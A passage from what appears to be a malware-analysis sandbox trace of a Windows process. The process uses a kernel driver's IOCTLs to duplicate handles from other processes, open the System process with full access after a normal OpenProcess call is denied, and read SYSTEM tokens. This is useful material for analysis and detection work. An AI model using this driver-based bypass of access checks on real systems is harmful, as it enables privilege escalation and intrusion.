hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e705e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e705e0*, lpBytesReturned=0x12d450*=0x64, lpOverlapped=0x0) returned 1 [0182.047] PsLookupProcessByProcessId (in: ProcessId=0x370, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.047] PsAcquireProcessExitSynchronization () returned 0x0 [0182.047] KeStackAttachProcess (in: PROCESS=0xfffffa800382ab30, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa800382ab30, ApcState=0xfffff88002aab5d0) [0182.047] ObReferenceObjectByHandle (in: Handle=0x9b8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80037acce0, HandleInformation=0x0) returned 0x0 [0182.047] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.047] PsReleaseProcessExitSynchronization () returned 0x2 [0182.047] ObfDereferenceObject (Object=0xfffffa800382ab30) returned 0x1ce [0182.047] ObQueryNameString (in: Object=0xfffffa80037acce0, ObjectNameInfo=0xfffffa800317d044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800317d044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.047] ObfDereferenceObject (Object=0xfffffa80037acce0) returned 0x5 [0182.048] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0182.048] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e705e0 | out: hHeap=0x2d0000) returned 1 [0182.048] CloseHandle (hObject=0xc0) returned 1 [0182.048] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x338) returned 0xc0 [0182.048] GetCurrentProcess () returned 0xffffffffffffffff [0182.048] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x320, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0182.048] CloseHandle (hObject=0xc0) returned 1 [0182.048] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0182.048] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x90) returned 0x2f4840 [0182.048] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x2f4840, ObjectInformationLength=0x90, ReturnLength=0x0 | out: ObjectInformation=0x2f4840, ReturnLength=0x0) returned 0x0 [0182.049] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4840 | out: hHeap=0x2d0000) returned 1 [0182.049] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e705e0 [0182.049] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e705e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e705e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0182.049] PsLookupProcessByProcessId (in: ProcessId=0x338, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0182.049] PsAcquireProcessExitSynchronization () returned 0x0 [0182.049] KeStackAttachProcess (in: PROCESS=0xfffffa8003801b30, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa8003801b30, ApcState=0xfffff88002aab5d0) [0182.049] ObReferenceObjectByHandle (in: Handle=0x320, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa8003674a60, HandleInformation=0x0) returned 0x0 [0182.049] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0182.049] PsReleaseProcessExitSynchronization () returned 0x2 [0182.049] ObfDereferenceObject (Object=0xfffffa8003801b30) returned 0xce [0182.049] ObQueryNameString (in: Object=0xfffffa8003674a60, ObjectNameInfo=0xfffffa800317e044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800317e044, ReturnLength=0xfffff88002aab550) returned 0x0 [0182.049] ObfDereferenceObject (Object=0xfffffa8003674a60) returned 0x2 [0182.049] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.047] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e705e0 | out: hHeap=0x2d0000) returned 1 [0183.047] CloseHandle (hObject=0xc4) returned 1 [0183.047] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x1e8) returned 0xc4 [0183.047] GetCurrentProcess () returned 0xffffffffffffffff [0183.047] DuplicateHandle (in: hSourceProcessHandle=0xc4, hSourceHandle=0x170, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc0) returned 1 [0183.047] CloseHandle (hObject=0xc4) returned 1 [0183.047] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0183.047] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x78) returned 0x2f4c70 [0183.047] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0183.047] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0183.047] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e705e0 [0183.048] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e705e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e705e0*, lpBytesReturned=0x12d450*=0x38, lpOverlapped=0x0) returned 1 [0183.048] PsLookupProcessByProcessId (in: ProcessId=0x1e8, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0183.048] PsAcquireProcessExitSynchronization () returned 0x0 [0183.048] KeStackAttachProcess (in: PROCESS=0xfffffa8003654700, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa8003654700, ApcState=0xfffff88002aab5d0) [0183.048] ObReferenceObjectByHandle (in: Handle=0x170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80018b5f40, HandleInformation=0x0) returned 0x0 [0183.048] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0183.048] PsReleaseProcessExitSynchronization () returned 0x2 [0183.048] ObfDereferenceObject (Object=0xfffffa8003654700) returned 0x40 [0183.048] ObQueryNameString (in: Object=0xfffffa80018b5f40, ObjectNameInfo=0xfffffa8003135044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003135044, ReturnLength=0xfffff88002aab550) returned 0x0 [0183.048] ObfDereferenceObject (Object=0xfffffa80018b5f40) returned 0xc [0183.048] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.049] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e705e0 | out: hHeap=0x2d0000) returned 1 [0183.049] CloseHandle (hObject=0xc0) returned 1 [0183.049] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x184) returned 0xc0 [0183.049] GetCurrentProcess () returned 0xffffffffffffffff [0183.049] DuplicateHandle (in: hSourceProcessHandle=0xc0, hSourceHandle=0x38, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x12d470, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x0 | out: lpTargetHandle=0x12d470*=0xc4) returned 1 [0183.049] CloseHandle (hObject=0xc0) returned 1 [0183.049] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0183.049] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x88) returned 0x310b70 [0183.049] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x310b70, ObjectInformationLength=0x88, ReturnLength=0x0 | out: ObjectInformation=0x310b70, ReturnLength=0x0) returned 0x0 [0183.049] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x310b70 | out: hHeap=0x2d0000) returned 1 [0183.049] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e705e0 [0183.049] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e705e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e705e0*, lpBytesReturned=0x12d450*=0x52, lpOverlapped=0x0) returned 1 [0183.049] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0183.049] PsAcquireProcessExitSynchronization () returned 0x0 [0183.049] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff88002aab5d0) [0183.049] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b01, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffff8a004498db0, HandleInformation=0x0) returned 0x0 [0183.050] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0183.050] PsReleaseProcessExitSynchronization () returned 0x2 [0183.050] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x17b [0183.050] ObQueryNameString (in: Object=0xfffff8a004498db0, ObjectNameInfo=0xfffffa800317b044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa800317b044, ReturnLength=0xfffff88002aab550) returned 0x0 [0183.050] ObfDereferenceObject (Object=0xfffff8a004498db0) returned 0x3 [0183.050] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.050] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e705e0 | out: hHeap=0x2d0000) returned 1 [0183.050] CloseHandle (hObject=0xc4) returned 1 [0183.050] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0183.050] GetLastError () returned 0x5 [0183.050] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335003c, lpInBuffer=0x12d400*, nInBufferSize=0x8, lpOutBuffer=0x12d408, nOutBufferSize=0x8, lpBytesReturned=0x12d390, lpOverlapped=0x0 | out: lpInBuffer=0x12d400*, lpOutBuffer=0x12d408*, lpBytesReturned=0x12d390*=0x8, lpOverlapped=0x0) returned 1 [0183.050] ZwOpenProcess (in: ProcessHandle=0xfffffa8002140500, DesiredAccess=0x10000000, ObjectAttributes=0xfffff88002aab688*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xfffff88002aab678*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xfffffa8002140500*=0xc4) returned 0x0 [0183.050] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.050] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350014, lpInBuffer=0x12d430*, nInBufferSize=0x20, lpOutBuffer=0x12d470, nOutBufferSize=0x8, lpBytesReturned=0x12d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x12d430*, lpOutBuffer=0x12d470*, lpBytesReturned=0x12d3d0*=0x8, lpOverlapped=0x0) returned 1 [0183.050] ZwOpenProcess (in: ProcessHandle=0xfffff88002aab5f0, DesiredAccess=0x40, ObjectAttributes=0xfffff88002aab608*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xfffff88002aab5f8*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xfffff88002aab5f0*=0xffffffff80000768) returned 0x0 [0183.050] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff80000768, SourceHandle=0x42c, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xfffffa8002140500, DesiredAccess=0xfffff88010000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xfffffa8002140500*=0xc0) returned 0x0 [0183.051] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.051] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.051] CloseHandle (hObject=0xc4) returned 1 [0183.051] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0183.051] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x78) returned 0x2f4c70 [0183.052] NtQueryObject (in: Handle=0xc0, ObjectInformationClass=0x2, ObjectInformation=0x2f4c70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x2f4c70, ReturnLength=0x0) returned 0x0 [0183.052] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x2f4c70 | out: hHeap=0x2d0000) returned 1 [0183.052] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e705e0 [0183.052] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e705e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e705e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0183.052] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0183.052] PsAcquireProcessExitSynchronization () returned 0x0 [0183.052] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff88002aab5d0) [0183.052] ObReferenceObjectByHandle (in: Handle=0xffffffff8000042c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b00, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80039086d0, HandleInformation=0x0) returned 0x0 [0183.052] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0183.052] PsReleaseProcessExitSynchronization () returned 0x2 [0183.052] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0183.052] ObQueryNameString (in: Object=0xfffffa80039086d0, ObjectNameInfo=0xfffffa8003182044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003182044, ReturnLength=0xfffff88002aab550) returned 0x0 [0183.052] ObfDereferenceObject (Object=0xfffffa80039086d0) returned 0x5 [0183.052] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.052] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e705e0 | out: hHeap=0x2d0000) returned 1 [0183.052] CloseHandle (hObject=0xc0) returned 1 [0183.052] OpenProcess (dwDesiredAccess=0x40, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0183.052] GetLastError () returned 0x5 [0183.052] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335003c, lpInBuffer=0x12d400*, nInBufferSize=0x8, lpOutBuffer=0x12d408, nOutBufferSize=0x8, lpBytesReturned=0x12d390, lpOverlapped=0x0 | out: lpInBuffer=0x12d400*, lpOutBuffer=0x12d408*, lpBytesReturned=0x12d390*=0x8, lpOverlapped=0x0) returned 1 [0183.052] ZwOpenProcess (in: ProcessHandle=0xfffffa8002140500, DesiredAccess=0x10000000, ObjectAttributes=0xfffff88002aab688*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xfffff88002aab678*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xfffffa8002140500*=0xc0) returned 0x0 [0183.053] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.053] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350014, lpInBuffer=0x12d430*, nInBufferSize=0x20, lpOutBuffer=0x12d470, nOutBufferSize=0x8, lpBytesReturned=0x12d3d0, lpOverlapped=0x0 | out: lpInBuffer=0x12d430*, lpOutBuffer=0x12d470*, lpBytesReturned=0x12d3d0*=0x8, lpOverlapped=0x0) returned 1 [0183.053] ZwOpenProcess (in: ProcessHandle=0xfffff88002aab5f0, DesiredAccess=0x40, ObjectAttributes=0xfffff88002aab608*(Length=0x30, RootDirectory=0x0, ObjectName=0x0, Attributes=0x200, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), ClientId=0xfffff88002aab5f8*(UniqueProcess=0x4, UniqueThread=0x0) | out: ProcessHandle=0xfffff88002aab5f0*=0xffffffff80000768) returned 0x0 [0183.053] ZwDuplicateObject (in: SourceProcessHandle=0xffffffff80000768, SourceHandle=0x428, TargetProcessHandle=0xffffffffffffffff, TargetHandle=0xfffffa8002140500, DesiredAccess=0xfffff88010000000, HandleAttributes=0x0, Options=0x0 | out: TargetHandle=0xfffffa8002140500*=0xc4) returned 0x0 [0183.053] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.053] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.053] CloseHandle (hObject=0xc0) returned 1 [0183.053] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x0, ObjectInformationLength=0x0, ReturnLength=0x12d4b0 | out: ObjectInformation=0x0, ReturnLength=0x12d4b0) returned 0xc0000004 [0183.053] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x78) returned 0x312b70 [0183.053] NtQueryObject (in: Handle=0xc4, ObjectInformationClass=0x2, ObjectInformation=0x312b70, ObjectInformationLength=0x78, ReturnLength=0x0 | out: ObjectInformation=0x312b70, ReturnLength=0x0) returned 0x0 [0183.053] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x312b70 | out: hHeap=0x2d0000) returned 1 [0183.053] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x808) returned 0x1e705e0 [0183.053] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e705e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e705e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0183.053] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff88002aab558 | out: Process=0xfffff88002aab558) returned 0x0 [0183.053] PsAcquireProcessExitSynchronization () returned 0x0 [0183.053] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff88002aab5d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff88002aab5d0) [0183.053] ObReferenceObjectByHandle (in: Handle=0xffffffff80000428, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80030d1b00, Object=0xfffff88002aab548, HandleInformation=0x0 | out: Object=0xfffff88002aab548*=0xfffffa80028d63f0, HandleInformation=0x0) returned 0x0 [0183.053] KeUnstackDetachProcess (ApcState=0xfffff88002aab5d0) [0183.054] PsReleaseProcessExitSynchronization () returned 0x2 [0183.054] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x79 [0183.054] ObQueryNameString (in: Object=0xfffffa80028d63f0, ObjectNameInfo=0xfffffa8003183044, Length=0x800, ReturnLength=0xfffff88002aab550 | out: ObjectNameInfo=0xfffffa8003183044, ReturnLength=0xfffff88002aab550) returned 0x0 [0183.054] ObfDereferenceObject (Object=0xfffffa80028d63f0) returned 0x3 [0183.054] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.054] HeapFree (in: hHeap=0x2d0000, dwFlags=0x0, lpMem=0x1e705e0 | out: hHeap=0x2d0000) returned 1 [0183.054] CloseHandle (hObject=0xc4) returned 1 [0183.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0183.054] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0xc4 [0183.054] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.054] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8007ff84f0, HandleInformation=0x0) returned 0x0 [0183.054] ObOpenObjectByPointer (in: Object=0xfffffa8007ff84f0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.054] ObfDereferenceObject (Object=0xfffffa8007ff84f0) returned 0x18 [0183.054] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002140500 | out: TokenHandle=0xfffffa8002140500*=0xc0) returned 0x0 [0183.054] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.054] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.055] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.055] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.057] CloseHandle (hObject=0xc0) returned 1 [0183.057] CloseHandle (hObject=0xc4) returned 1 [0183.057] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0xc4 [0183.057] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.057] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa8003533060, HandleInformation=0x0) returned 0x0 [0183.057] ObOpenObjectByPointer (in: Object=0xfffffa8003533060, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.057] ObfDereferenceObject (Object=0xfffffa8003533060) returned 0x7e [0183.057] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002140500 | out: TokenHandle=0xfffffa8002140500*=0xc0) returned 0x0 [0183.057] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.057] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.057] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.058] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.060] CloseHandle (hObject=0xc0) returned 1 [0183.060] CloseHandle (hObject=0xc4) returned 1 [0183.060] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0xc4 [0183.060] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.060] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, HandleInformation=0x0 | out: Object=0xfffff88002aab668*=0xfffffa80018b85a0, HandleInformation=0x0) returned 0x0 [0183.060] ObOpenObjectByPointer (in: Object=0xfffffa80018b85a0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88002aab670 | out: Handle=0xfffff88002aab670*=0xffffffff80000768) returned 0x0 [0183.060] ObfDereferenceObject (Object=0xfffffa80018b85a0) returned 0x71 [0183.060] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000768, DesiredAccess=0x8, TokenHandle=0xfffffa8002140500 | out: TokenHandle=0xfffffa8002140500*=0xc0) returned 0x0 [0183.060] ZwClose (Handle=0xffffffff80000768) returned 0x0 [0183.060] IofCompleteRequest (Irp=0xfffffa80034bd890, PriorityBoost=0) [0183.061] GetTokenInformation (in: TokenHandle=0xc0, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0183.061] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="SYSTEM", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0183.062] CloseHandle (hObject=0xc0) returned 1 [0183.062] CloseHandle (hObject=0xc4) returned 1 [0183.062] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0xc4 [0183.062] DeviceIoControl (in: hDevice=0x78, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0183.062] ObReferenceObjectByHandle (in: Handle=0xc4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88002aab668, 